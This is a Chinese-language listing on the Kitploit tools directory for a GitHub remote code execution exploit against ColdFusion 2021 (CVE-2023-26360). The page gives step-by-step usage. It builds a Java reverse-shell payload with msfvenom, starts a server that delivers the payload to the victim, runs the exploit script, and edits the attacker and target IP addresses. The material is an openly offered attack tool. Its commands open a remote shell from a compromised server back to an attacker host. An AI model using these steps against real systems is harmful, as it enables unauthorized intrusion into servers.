Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/h3rm1tr3b0rn/cve-2023-26360-rce
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubh3rm1tr3b0rn/cve-2023-26360-rce

CVE-2023-26360-RCE

ColdFusion 2021(CVE-2023-26360)远程代码执行漏洞利用程序

查看仓库
11310个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-26360 - ColdFusion 2021 上的远程代码执行

有时,脚本在第一次尝试时不会生效。多试几次即可

如何执行

使用 msfvenom 创建载荷

root@kitploit:~
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java

启动 server.py

  • 该服务器将在使用 cve.2023-26360.py 完成初始访问后,将载荷发送到 Coldfusion 服务器,因此需要先启动它。
root@kitploit:~
python3 server.py 8000
  • 参数 8000 是服务器将监听的端口。

  • 需要注意的是,第 12 行配置了服务器的 IP 地址,因此请修改它:

root@kitploit:~
s.bind(('192.168.56.1',port))

运行 cve-2023-26360.py

  • 要运行该漏洞利用程序,请执行:
root@kitploit:~
python3 cve-2023-26360.py 8000
  • 与 server.py 一样,参数 8000 是 server.py 将监听的端口。因此,两条命令中的端口必须相同。

  • cve-2023-26360.py 中的第 8 行设置了 server.py 将监听的 IP 地址。必须正确配置它。

  • cve-2023-26360.py 中的第 11 行设置了 Coldfusion 服务器的 IP 地址,因此请修改它:

root@kitploit:~
url = "http://192.168.56.102:8500"

已在以下环境测试

  • ColdFusion 2021 - Windows Server 2019
下载工具